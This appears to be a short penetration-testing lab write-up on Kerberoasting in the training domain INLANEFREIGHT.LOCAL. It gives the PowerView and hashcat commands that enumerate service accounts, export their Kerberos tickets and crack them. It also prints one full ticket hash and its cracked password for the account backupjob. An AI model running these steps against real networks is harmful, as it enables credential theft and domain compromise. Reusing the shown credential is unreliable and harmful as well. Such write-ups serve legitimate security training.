Kerberoasting

Next we look for SPN accounts. We can use PowerView. Run this after importing:

Get-DomainUser * -SPN |Select samaccountname

samaccountname
--------------
azureconnect
backupjob
krbtgt
mssqlsvc
sqltest
sqlqa
sqldev
mssqladm
svc_sql
sqlprod
sapsso
sapvc
vmwarescvc

Importing them as .csv

Get-DomainUser * -SPN -verbose |  Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_spns.csv -NoTypeInformation

Opening the file:

Its on column 5 so I used csvtool to extract only the hashes

csvtool col 5 ilfreight_spns.csv > hashes

hashcat -m 13100 hashes /usr/share/wordlists/rockyou.txt.gz

And we get hit

$krb5tgs$23$*backupjob$INLANEFREIGHT.LOCAL$backupjob/veam001.inlanefreight.local*$593491688130bbcd4bc5bd65cc03d183$b2b65c016007c58a72d13da92c5c5bc3fe2a2fed600e572f59138caffce1eca16082eb3f86204e97db59a6a5329b98bc4b517c73d1052c8863827de5881f0baa7ec77717579f841aacd600ffcecb06e9cec94fdb8dac08c95edee95f60318cda6488b40b5d02c654cf7fed47fbe7457a9d4778c9f4d4077cee7dfc1eb2e325ef147420841911ddd6c2b491cf58eb57e0888df1136ae58273ce8d3eac2b09483df083a7a821c08a002871a014b288f2d1166855ed582e862e713f7998addd42fbc5bcc44fd6aef8c0c63f910a3f18ed1ead318926634e2d288b1ed20459931afb253cc8404e049fe2a425e6b7f53fe70b8cfd007967eb28ddcdaba6a778bd750819031b603e0318a6b925aa34b46721a3812fbd9c89ba4fd9b67921d3668696df9cae6443c81151a3368d2da21755222161082e84ba5b48173cd0a6a0f2d17252f9cc18517ed5ec7a3af79e5f435e3fd4cc0af9f6f9d6adf9f64f91850f89ab6509e3cc856aa168f160ccff8631f9285fe6698f81dea4fe77c467e5bfa760143e54371edfde80bcedb18980c0ca783c652edcc11443a002e38f7c6e76360bae0033fa3e7e825b4debfbb1beed94cb5251ef072a3d220af76c84cc76626faf59fbaf25d376212c5cd244e3c49cfc06296c404d1c99228ea1908c54003eee44258c3b5c18b14f26372232eb45d56ece7f0619ad2b952fb4f9b9f8c555d75d5fe57d767208e4bf40902859033bd6569ffadb84c029db8ae2e9563e7c222a7c285e5c1e35b3afa294aa86e6b79d216c314ff433df9fb8561c88cad4123db9abb5f45eb6b25c934f69053a72f03607f6e4475b7e6c9818ee2055fd91c9cee531eb7ac63bdd1c35758296fcf377cae17cc2f5c7da184c341df4db0022a9e6c3648c4046b6cd78c9e335ec7cd62534ba1e6c471e15595bd2d1aacc2ace9c0c128c6e28a676fd7f86f3a8bcdefda11cbbddd3028185a97fe1daed3ee1c293515fa03d9264227c6178be6553a20d7e527a7e8118df33e16164edef2c3ae4938d1a6f716c254dfdb7a323a8b06852a51c5df459458316deb23c95765b525c25d2e2dc5bb39a820656f2c8cd8f9519239d7152b148cf9cb4dc309769ea83f84da584a7f52db018167f92c759055fb0c3c57b96a7f43152eaab5b6ff1d68d022d46a595a7e8f5a8b966daf7aecac57312732988739fc948e2620b14430432838e043323e91414ca58a47e9456d0f16e65965562d0808279a2d6301d6e4d296e71cc4caed2f3cc4a76e759b3fffa7c62a4ea5bfcdb22345226943206b5c75219d49b3436117fc152297e92bfac4200dd3809aff62743129a0cb0b5273e80471601bf63c9811ced13d86b1ee1e98417d3134850352786ca2d6f6be30ed6526ea5255c02b3d6e3265e46b7051b7f2b48b26566e143fbbf72ce99d668ae7c1bea6309dfc8724fcea54cb123faa20dfc20117ca8c6c43e16bf83732f0a0e678d59505106b44e6b4e3eedda51a8ce:lucky7

This user also doesnt show up in Bloodhound.

PreviousShares Hunting NextPassword Spraying

Last updated 10 months ago